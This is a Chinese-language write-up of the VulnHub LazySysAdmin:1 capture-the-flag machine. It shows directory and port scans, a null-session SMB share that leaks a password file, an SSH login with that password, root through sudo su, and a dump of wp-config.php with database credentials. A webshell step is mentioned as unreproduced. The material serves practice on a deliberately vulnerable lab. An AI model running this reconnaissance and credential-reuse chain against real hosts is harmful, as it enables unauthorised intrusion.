VulnHub LAZYSYSADMIN: 1 writeup

下载地址:https://www.vulnhub.com/entry/lazysysadmin-1,205/
扫目录发现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
❯ dirsearch -e * –timeout=2 -t 1 -x 400,403,404,500,503,429 -u http://192.168.231.23

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: 1.py | HTTP method: GET | Threads: 1 | Wordlist size: 8989

Target: http://192.168.231.23/

[21:24:08] Starting:
[21:24:13] 200 - 742B - /apache/
[21:24:16] 200 - 35KB - /index.html
[21:24:16] 200 - 76KB - /info.php
[21:24:16] 301 - 320B - /javascript -> http://192.168.231.23/javascript/
[21:24:17] 301 - 313B - /old -> http://192.168.231.23/old/
[21:24:17] 200 - 736B - /old/
[21:24:17] 301 - 320B - /phpmyadmin -> http://192.168.231.23/phpmyadmin/
[21:24:18] 200 - 8KB - /phpmyadmin/
[21:24:18] 200 - 8KB - /phpmyadmin/index.php
[21:24:18] 200 - 92B - /robots.txt
[21:24:19] 301 - 314B - /test -> http://192.168.231.23/test/
[21:24:19] 200 - 738B - /test/
[21:24:20] 200 - 12KB - /wordpress/
[21:24:20] 200 - 2KB - /wordpress/wp-login.php
[21:24:20] 301 - 312B - /wp -> http://192.168.231.23/wp/
[21:24:21] 200 - 734B - /wp/

Task Completed

robots.txt

1
2
3
4
5
User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/

info.php可以看到phpinfo的信息
wordpress可以得到名字togie
namp扫一下端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ nmap 192.168.231.23
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 21:23 CST
Nmap scan report for 192.168.231.23 (192.168.231.23)
Host is up (0.0024s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
6667/tcp open irc
MAC Address: 00:0C:29:62:2B:B9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds

发现445端口,利用enum4linux扫共享目录
发现空账户登录

发现share$共享文件夹

访问服务器smb://192.168.231.23/share$从中发现deets.txt

1
2
3
4
5
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

直接尝试登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
❯ sshpass -p 12345 ssh togie@192.168.231.23
Warning: Permanently added '192.168.231.23' (ECDSA) to the list of known hosts.
##################################################################################################
# Welcome to Web_TR1 #
# All connections are monitored and recorded #
# Disconnect IMMEDIATELY if you are not an authorized user! #
##################################################################################################

Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Tue Sep 21 00:19:11 AEST 2021

System load: 0.0 Processes: 175
Usage of /: 46.1% of 2.89GB Users logged in: 0
Memory usage: 34% IP address for eth0: 192.168.231.23
Swap usage: 0%

Graph this data and manage this system at:
https://landscape.canonical.com/

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$ sudo su
[sudo] password for togie:
root@LazySysAdmin:/home/togie# ls
root@LazySysAdmin:/home/togie# cd /root
root@LazySysAdmin:~# ls
proof.txt
root@LazySysAdmin:~# cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu

此外可以通过查看wordpress/wp-config.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/

define('AUTH_KEY', 'SAq-)W,-K9tFcW(=?ro4SJ5)R.mx%+@KL-I@PB{<-i>g3n^1|E<-uN|}F;:PbMYJ');
define('SECURE_AUTH_KEY', 'u .o%Ld%m27waNqK+*`~&j6~v!d7vI|OwA|hd8%r#ri_`WRIcCN-KiTSWmk)1;xG');
define('LOGGED_IN_KEY', 'iX^NN~N7R5Mdmeh:$iLY60r~K[)^f5vk`wGDO30r8Ns)gA17FRt2|$#S!Lq@-<|`');
define('NONCE_KEY', ',_xAk=+)B7f_a|#J44}qWca!=`s4{C2.Xe>sY%4Ybd5*3z9WRH-ysm=.|Gm^McvU');
define('AUTH_SALT', '(:^<BWwzWYx ,f^9anxD,+V+2-&,VJ@@)U7CSzjv_MvD67>?05ihCG]Q1K:_7Xsa');
define('SECURE_AUTH_SALT', 'ud]}}0rWRMGZ+a`Hky G7|i|+c7YyH4=l#5{/1R=|]PYrOmN{&0JuqkO=o5vyGg5');
define('LOGGED_IN_SALT', '=M_DRp%vGmijIhl%K!(v>:,*RR<cl9ahav%{q`&I/0HD/$W/LK:mxR37PKh?Zzi8');
define('NONCE_SALT', 'ABOgE>G:U;Q/hO^>jBG5e96OL6+{=mV,|2S~c,~dhVa!E/&Q[Mc8#IgVTuXAI}sY');

;

/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');

/* Dynamic site URL added by Togie */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');


/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

访问wordpress/wp-login.php,利用Admin:TogieMYSQL12345^^登录,写马获得权限,目前复现失败。